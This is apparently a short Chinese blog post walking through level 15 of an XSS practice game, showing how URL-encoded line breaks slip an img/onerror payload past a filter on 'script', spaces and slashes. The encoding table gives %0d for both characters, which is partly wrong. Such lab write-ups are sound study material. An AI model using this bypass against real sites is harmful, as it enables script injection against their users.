xss小游戏源码分析 (5)

get传入可以word，转换为小写，让过滤script，空格，/，可以使用url编码来绕过

符号 url编码
回车   %0d  
换行   %0d  

payload:

level15.php?keyword=<img%0asrc=http://www.likecs.com/x%0aonerror=alert('XSS')> 参考文章

国光大佬:https://www.sqlsec.com/2020/01/xss.html
最后欢迎访问我的博客:https://lmg66.github.io/